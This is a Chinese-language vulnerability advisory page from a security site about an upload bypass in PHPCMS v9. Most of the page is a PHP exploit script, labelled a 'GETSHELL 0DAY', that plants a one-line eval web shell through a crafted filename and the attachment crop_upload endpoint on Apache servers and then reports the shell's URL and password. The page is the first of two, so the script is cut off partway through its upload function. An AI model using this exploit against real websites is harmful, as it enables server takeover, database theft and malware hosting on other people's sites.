PHPCMS v9 文件后缀提取错误代码上传漏洞下载

来源:黑吧安全网 浏览:965次 时间:2014-04-30
做网站找雨过天晴工作室

 受影响系统:

PHPCMS Phpcms 9

描述:


PHPCMS网站管理系统是国内主流CMS系统之一。PHPCMS V9版于2010年推出,是应用较为广泛的建站工具。第三方数据显示,目前使用PHPCMS V9搭建的网站数量多达数十万个,包括联合国儿童基金会等机构网站,以及大批企业网站均使用PHPCMS V9搭建和维护。

PHPCMS v9在实现上存在安全漏洞,对上传的文件后缀进行安全限制时,考虑不全,导致在Web服务器为Apache的情况下绕过安全限制。主要代码在文件\phpcms\libs\functions\global.func.php中的fileext函数进行文件后缀提取。攻击者可以通过该漏洞直接上传网站木马控制服务器,最终导致网站“脱库”、“挂马”等严重后果。

<*来源:n3wF
  
  链接:http://www.wooyun.org/bugs/wooyun-2013-019299
        http://www.jiasule.com/news/5135a60075db5c6ac700000a/
*>

测试方法:


警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

n3wF ()提供了如下测试方法:
<?php
error_reporting(E_ERROR);
set_time_limit(0);
$pass="ln";
print_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY 

code by L.N.

apache 适用(利用的apache的解析漏洞)
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url path

Example: 
    1.php '.$argv[0].' lanu.sinaapp.com
    2.php '.$argv[0].' lanu.sinaapp.com /phpcms
+---------------------------------------------------------------------------+
');
exit;
}

$url = $argv[1];
$path = $argv[2];
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
if($ret=Create_dir($url,$path))
{
    //echo $ret;
    $pattern = "|Server:[^,]+?|U";
    preg_match_all($pattern, $ret, $matches);
    if($matches[0][0])
    {
        if(strpos($matches[0][0],'Apache') == false)
        {
            echo "\n亲!此网站不是apache的网站。\n";exit;
        }
    }
    $ret = GetShell($url,$phpshell,$path,$file);
    $pattern = "|http:\/\/[^,]+?\.,?|U";
    preg_match_all($pattern, $ret, $matches);
    if($matches[0][0])
    {
        echo "\n".'密码为: '.$pass."\n";
        echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
    }
    else
    {    
        $pattern = "|\/uploadfile\/[^,]+?\.,?|U";
        preg_match_all($pattern, $ret, $matches);
        if($matches[0][0])
        {
            echo "\n".'密码为: '.$pass."\n";
            echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
        }
        else
        {
            echo "\r\n没得到!\n";exit;
        }        
    }
}

function GetShell($url,$shell,$path,$js)
{
    $content =$shell;
    $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n"; 
    $data .= "Host: ".$url."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";

[1] [2]  下一页